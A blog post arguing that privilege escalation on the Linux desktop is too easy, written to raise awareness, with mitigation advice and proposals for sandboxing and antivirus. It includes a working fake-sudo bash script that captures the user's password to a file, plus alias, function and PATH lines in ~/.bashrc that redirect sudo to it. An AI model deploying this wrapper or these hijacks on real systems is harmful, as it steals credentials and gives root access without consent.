+++
draft = false
author = "Ozzy Meadows"
title = "Linux Desktop Privilege Escalation"
date = 2020-10-11
description = "Privilege Escalation on the GNU/Linux Desktop is far too easy."
categories = [
    "GNU/Linux",	
    "InfoSec",
]	
+++
For the majority of Linux desktops, a compromised user in the sudo group is equivalent to having root access. This needs to change.
<!--more-->

The primary problem is that programs running under a standard user have far too many permissions, most often the same as the user running the program; this enables malicious software to use intended functionality to their advantage: such as altering environment variables or `~/.bashrc`.

Moreover, users routinely require root access to install & update applications on their system; as a result, the majority of GNU/Linux desktop users utilize root access (via `sudo` or `su`) on their primary user account. Most of them don't even realize how susceptible this makes them to malicious software.

I hope the day when we get a massive spike of users isn't one where the status quo hasn't changed. If it hasn't, malicious actors will no longer ignore desktop GNU/Linux; they will show us how insecure we truly are.

# Escalating to Root
`su` and `sudo` are simple avenues of attack. They are normal (SUID) programs, with no special protections of any kind. No fancy exploits or bugs are needed, just intended functionality used maliciously.

The following is a simple script that retrieves the sudo users password:
``` 
# This script is assumed to be located at /tmp/sudo and marked as executable
#!/bin/bash
if [[ "${@}" = "" ]]; then
  /usr/bin/sudo
else

# Asks for the sudo password in a way that looks just like the true sudo command
  read -s -r -p "[sudo] password for ${USER}: " password
	
# Saves the password to/tmp/password
  echo "${password}" > /tmp/password
  echo -e "\nSorry, try again."
	
# Redirects to the true sudo command
  /usr/bin/sudo ${@}
	
fi
```

Now all an attacker has to do to get the password is to redirect the `sudo` command to `/tmp/sudo`, which is a trivial task when you have the same permissions as the user.

In order of precedence, the following are options to redirect `sudo` to `/tmp/sudo`:
- `alias sudo='/tmp/sudo'` - creates an alias named sudo
- `function sudo { /tmp/sudo; }` - creates a function named sudo
- `export PATH="/tmp:${PATH}"`  - adds /tmp to the start of  your `$PATH`

All of the above can be added to a users `~/.bashrc` to maintain its effect.

You may think one way to defend against these attacks is to use the absolute path, but sadly the following defeats that idea:

```
# Creates two functions which take precedence over the absolute path
function /usr/bin/sudo { /tmp/sudo; }
function /bin/sudo { /tmp/sudo; }
```

# GUI & Keyboard Isolation
Another serious issue with the GNU/Linux desktop is the total nonexistence of GUI isolation, making it insecure to log into any GUI with root or sudo user.

Xorg is one of the serious offenders. An older [post](https://blog.invisiblethings.org/2011/04/23/linux-security-circus-on-gui-isolation.html) by Joanna Rutkowska is a fun read regarding the issues with Xorg.  Beyond Xorg, there are some other problems with Isolation (like`/proc/pid/sched`).

I don't have all that much to say regarding this topic. I must do more research and hope to post on this topic.

# Mitigating the Issue
A fantastic [guide](https://www.whonix.org/wiki/Root#Prevent_Malware_from_Sniffing_the_Root_Password) on the Whonix wiki shows how to have a secure sudo user. TLDR: create a sudo separate user just for this purpose and use a virtual terminal exclusively (no GUI).

However, doing the above only protects the root user, and all things considered, the primary user is often more valuable; therefore, if you want to be secure, consider using Windows or macOS. Yes, I do believe they have better security standards, but this post isn't about that.

# Moving Towards a Solution
1. Awareness: the most pressing issue. If people don't know, there won't be a solution. For instance, a page like [this](https://help.ubuntu.com/community/Antivirus) misleads people into thinking the GNU/Linux desktop is secure.

2. Remove the requirement for root access: ideally, root should only be enabled in single-user mode, but because root is required for package management, that doesn't work. We need an easy avenue for user-specific packages, so root access isn't a requirement for a functional Linux install. 

3. Proper Sandbox: without a proper sandbox, it hardly even matters if an attacker can get root access, they have all the data they need regardless. AppArmor and SELinux are not cutting it.

4. An antivirus: for naive users, I think this is a must. All it would need to do is scan a file before a user enables the execution bit.

5. The above must be mainstream and easy to implement. Without that, it will hardly matter.

However, a bigger problem for desktop GNU/Linux going mainstream is the Linux Kernel. In its current state, it's riddled with security holes. But that's for another post.

# References
A *huge* thanks to the [Whonix](https://www.whonix.org/) team and their phenomenal wiki [page](https://www.whonix.org/wiki/Dev/Strong_Linux_User_Account_Isolation) on the subject. They are the primary reference for this post.

Another *huge* thanks to Madaidan's [post](https://madaidans-insecurities.github.io/linux.html), which lead me to the above Whonix wiki page.
